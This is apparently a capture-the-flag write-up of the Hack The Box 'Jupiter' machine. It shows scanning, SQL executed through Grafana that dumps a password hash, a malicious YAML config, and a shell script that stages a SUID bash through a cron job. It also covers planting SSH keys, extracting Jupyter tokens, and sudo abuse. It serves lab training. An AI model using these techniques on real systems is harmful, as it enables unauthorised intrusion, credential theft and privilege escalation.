Nmap
┌──(root💀kali)-[/home/kali/hacktheboxtools]
└─# nmap -A 10.10.11.216
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 11:21 EDT
Nmap scan report for 10.10.11.216
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 ac5bbe792dc97a00ed9ae62b2d0e9b32 (ECDSA)
|_ 256 6001d7db927b13f0ba20c6c900a71b41 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://jupiter.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=6/5%OT=22%CT=1%CU=30597%PV=Y%DS=2%DC=T%G=Y%TM=647DFDB9
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=109%TI=Z%CI=Z%TS=B)SEQ(SP=10
OS:1%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M537ST11NW7%O2=M537ST11NW7%O3
OS:=M537NNT11NW7%O4=M537ST11NW7%O5=M537ST11NW7%O6=M537ST11)WIN(W1=FE88%W2=F
OS:E88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M537NNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 270.35 ms 10.10.16.1
2 176.97 ms 10.10.11.216
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.74 seconds
The two usual ports, 22 (SSH) and 80 (HTTP). The HTTP title shows a redirect to http://jupiter.htb/, so the hostname is needed before the site will serve anything.

Add to /etc/hosts:
10.10.11.216 jupiter.htb
Main domain

The root domain does not seem to have any functionality for now, so let's brute-force virtual hosts.
┌──(root💀kali)-[/home/kali/hacktheboxtools]
└─# gobuster vhost -u http://jupiter.htb --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://jupiter.htb
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
2023/06/05 11:25:42 Starting gobuster in VHOST enumeration mode
===============================================================
Found: kiosk.jupiter.htb Status: 200 [Size: 34390]
Progress: 114441 / 114442 (100.00%)
===============================================================
2023/06/05 11:41:33 Finished
===============================================================
kiosk.jupiter.htb
There is a kiosk.jupiter.htb vhost; add it to the hosts file as well.

It is a Grafana application.

Looking through Burp's HTTP history, there is a request like this one:

The SQL statement in this request is under our control: Grafana forwards it as-is to its PostgreSQL datasource, so whatever we put there is executed by the database backend.

Reference: https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql
PostgreSQL
List the databases
SELECT datname FROM pg_database;

| datname |
|---|
| postgres |
| moon_namesdb |
| template1 |
| template0 |
Read credentials
SELECT usename, passwd from pg_shadow;

| usename | passwd |
|---|---|
| postgres | NULL |
| grafana_viewer | SCRAM-SHA-256$4096:K9IJE4h9f9+tr7u7AZL76w==$qdrtC1sThWDZGwnPwNctrEbEwc8rFpLWYFVTeLOy3ss=:oD4gG69X8qrSG4bXtQ62M83OkjeFDOYrypE3tUv0JOY= |
RCE



Try a reverse shell


Shell!!!! ^-^
Information gathering
linpeas
Run linpeas to gather information.

User-related information
pspy

A pile of reverse shells, haha; too many people are attacking the box at the same time.
Processes run by juno

After watching for a while, uid=1000 (juno) runs a script, shadow-simulation.sh (presumably a network simulation), and since it recurs it looks like a scheduled task.
Right after starting it deletes /dev/shm/shadow.data,
then runs the shadow command with /dev/shm/network-simulation.yml as its argument.
So let's look at that configuration file.

network-simulation.yml
general:
  # stop after 10 simulated seconds
  stop_time: 10s
  # old versions of cURL use a busy loop, so to avoid spinning in this busy
  # loop indefinitely, we add a system call latency to advance the simulated
  # time when running non-blocking system calls
  model_unblocked_syscall_latency: true
network:
  graph:
    # use a built-in network graph containing
    # a single vertex with a bandwidth of 1 Gbit
    type: 1_gbit_switch
hosts:
  # a host with the hostname 'server'
  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/python3
      args: -m http.server 80
      start_time: 3s
  # three hosts with hostnames 'client1', 'client2', and 'client3'
  client:
    network_node_id: 0
    quantity: 3
    processes:
    - path: /usr/bin/curl
      args: -s server
      start_time: 5s
This configuration reads as: the server host starts a web service on port 80, and the client hosts request that web service.
The path field looks like the absolute path of the binary to execute,
and args are naturally its arguments. Shadow runs these as real processes on the box, under the user who launched it (juno), so the file is effectively a list of commands juno will run for us.
Let's try having it copy bash and set the SUID bit on the copy (chmod u+s) so that we can run the copy as juno.
general:
  # stop after 10 simulated seconds
  stop_time: 10s
  # old versions of cURL use a busy loop, so to avoid spinning in this busy
  # loop indefinitely, we add a system call latency to advance the simulated
  # time when running non-blocking system calls
  model_unblocked_syscall_latency: true
network:
  graph:
    # use a built-in network graph containing
    # a single vertex with a bandwidth of 1 Gbit
    type: 1_gbit_switch
hosts:
  # a host with the hostname 'server'
  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/cp
      args: /bin/bash /tmp/someb0dy/bash
      start_time: 3s
  # three hosts with hostnames 'client1', 'client2', and 'client3'
  client:
    network_node_id: 0
    quantity: 3
    processes:
    - path: /usr/bin/chmod
      args: u+s /tmp/someb0dy/bash
      start_time: 5s
Then upload it to /dev/shm/ on the target. Worth noting: this directory is a tmpfs, so its contents live in memory and do not survive a reboot.
I first upload the file to the /tmp/someb0dy directory,
then run cp /tmp/someb0dy/network-simulation.yml /dev/shm/ to overwrite the original network-simulation.yml.
Remember to give /tmp/someb0dy 777 permissions, otherwise the juno user has no permission to write the bash copy into this folder.

Then, in /tmp/someb0dy, run ./bash -p (the -p keeps the effective uid instead of dropping it), and we successfully get juno's privileges.
Going to /home/juno and reading the script confirms it:
bash-5.1$ cat shadow-simulation.sh
#!/bin/bash
cd /dev/shm
rm -rf /dev/shm/shadow.data
/home/juno/.local/bin/shadow /dev/shm/*.yml
cp -a /home/juno/shadow/examples/http-server/network-simulation.yml /dev/shm/
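The script above is what makes timing matter: it runs `shadow /dev/shm/*.yml` and then copies the pristine network-simulation.yml back, so our file only counts if it is in place before the next run and is wiped right after. The helper below is an added example (not from the original writeup) that stages the payload from the postgres shell and polls for the SUID copy rather than guessing when the cron fires. It writes the same configuration as the YAML above, minus the `quantity: 3` clients (one chmod is enough); /tmp/someb0dy and /dev/shm are the paths used in this writeup.

```shell
#!/bin/sh
# Added example (not from the original writeup): stage the SUID-bash
# payload for juno's shadow-simulation.sh cron job and wait for it.
# Assumed paths: staging dir /tmp/someb0dy, config dir /dev/shm.

# Write a shadow config whose "server" host copies bash into $1 and whose
# "client" host makes that copy setuid. $2 is the output file.
write_suid_payload() {
    stage=$1; out=$2
    cat > "$out" <<EOF
general:
  stop_time: 10s
  model_unblocked_syscall_latency: true
network:
  graph:
    type: 1_gbit_switch
hosts:
  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/cp
      args: /bin/bash $stage/bash
      start_time: 3s
  client:
    network_node_id: 0
    processes:
    - path: /usr/bin/chmod
      args: u+s $stage/bash
      start_time: 5s
EOF
}

# Poll until $1 exists with the setuid bit (test -u) or $2 seconds pass.
# Returns 0 once the bit is set, 1 on timeout.
wait_for_suid() {
    f=$1; timeout=${2:-120}; i=0
    while [ "$i" -lt "$timeout" ]; do
        [ -u "$f" ] && return 0
        sleep 1; i=$((i + 1))
    done
    return 1
}

# Full flow from the postgres shell: prepare the world-writable staging
# dir (juno has to write the bash copy there), drop the config where the
# cron job globs for it, then exec the SUID copy with -p to keep euid=juno.
stage_and_wait() {
    stage=${1:-/tmp/someb0dy}
    mkdir -p "$stage"
    chmod 777 "$stage"
    write_suid_payload "$stage" "$stage/network-simulation.yml"
    cp "$stage/network-simulation.yml" /dev/shm/network-simulation.yml
    wait_for_suid "$stage/bash" 300 && exec "$stage/bash" -p
}
```

Because the script's last line restores the original YAML, a second attempt means copying the payload into /dev/shm again; the SUID copy in /tmp/someb0dy, however, stays until someone removes it.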
Writing an SSH public key
We can also write our public key into .ssh/authorized_keys and then log in over SSH.
ssh-keygen -f someb0dy generates the key pair (someb0dy is the private key, someb0dy.pub the public key).
cp /tmp/someb0dy/someb0dy.pub /home/juno/.ssh/authorized_keys

Logged in successfully with the private key. juno is in the science group, so let's search for files that belong to that group.

Proxying traffic with frp
There seem to be quite a few ports listening on localhost, so set up a proxy to take a look at them.

Why search for token information here? Because port 8888 is running a Jupyter service, and Jupyter authenticates with a token.

None of the ones found above worked.
So I looked directly at the log file; today is 6.6, and the token in there works.

The one from the log works.
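The reason the earlier tokens failed and the logged one worked is that a Jupyter server generates a fresh token on every start and prints its access URL (with ?token=) into its log, so only the most recent start's token is live. The snippet below is an added example, not part of the original writeup: it pulls tokens from a Jupyter log in order, deduplicates the repeated localhost/127.0.0.1 lines, and picks the latest one. The log path and the sample log lines are constructed for the example, not taken from the target.

```shell
#!/bin/sh
# Added example (not from the original writeup): recover the live Jupyter
# token from the server log. Sample data below is constructed.

# Print every token in log $1, oldest first, each token once. Jupyter
# logs the URL twice per start (localhost and 127.0.0.1), hence the awk
# order-preserving dedupe. Tokens are 48 hex chars; 16+ is accepted here.
jupyter_tokens() {
    grep -o 'token=[0-9a-f]\{16,\}' "$1" | sed 's/^token=//' | awk '!seen[$0]++'
}

# The most recently logged token, i.e. the one the running server accepts.
latest_jupyter_token() {
    jupyter_tokens "$1" | tail -n 1
}

# Tokens logged on date $2 (YYYY-MM-DD) only, using the timestamp that
# Jupyter's "[I <date> <time> ServerApp]" log prefix carries.
jupyter_tokens_on() {
    grep "^\[[A-Z] $2 " "$1" | grep -o 'token=[0-9a-f]\{16,\}' \
        | sed 's/^token=//' | awk '!seen[$0]++'
}

# Constructed sample log (format mimics jupyter-server; tokens invented):
# two server starts, so the 06-05 token is stale and the 06-06 one is live.
write_sample_log() {
    cat > "$1" <<'EOF'
[I 2023-06-05 09:12:03.101 ServerApp] Jupyter Server 2.0.0 is running at:
[I 2023-06-05 09:12:03.101 ServerApp] http://localhost:8888/lab?token=0a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4e5f6071
[I 2023-06-05 09:12:03.101 ServerApp]     http://127.0.0.1:8888/lab?token=0a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4e5f6071
[I 2023-06-06 02:31:44.587 ServerApp] Jupyter Server 2.0.0 is running at:
[I 2023-06-06 02:31:44.587 ServerApp] http://localhost:8888/lab?token=ff00ee11dd22cc33bb44aa5599668877ff00ee11dd22cc33
[I 2023-06-06 02:31:44.587 ServerApp]     http://127.0.0.1:8888/lab?token=ff00ee11dd22cc33bb44aa5599668877ff00ee11dd22cc33
EOF
}

# Usage against a real log, e.g. one found under the science group's files:
#   latest_jupyter_token /path/to/jupyter.log
```

Feed the printed token to the Jupyter login page reached through the frp proxy; if it is rejected, the server has restarted since that log line, and the log is again the place to look.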



Same technique as with the previous user: write our public key into .ssh/authorized_keys for jovian.

Privilege escalation
jovian@jupiter:/usr/local/bin$ sudo -l
Matching Defaults entries for jovian on jupiter:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User jovian may run the following commands on jupiter:
(ALL) NOPASSWD: /usr/local/bin/sattrack
We can run **/usr/local/bin/sattrack** as root without a password.

Running it directly prints some hints.
Replace bash with this binary.

Summary
This box is medium difficulty overall. Standard information gathering turns up the subdomain; further enumeration there leads through Grafana to PostgreSQL, which gives a shell as the PostgreSQL user; inspecting process information leads to juno's privileges; juno's group membership leads to jovian's; and finally root.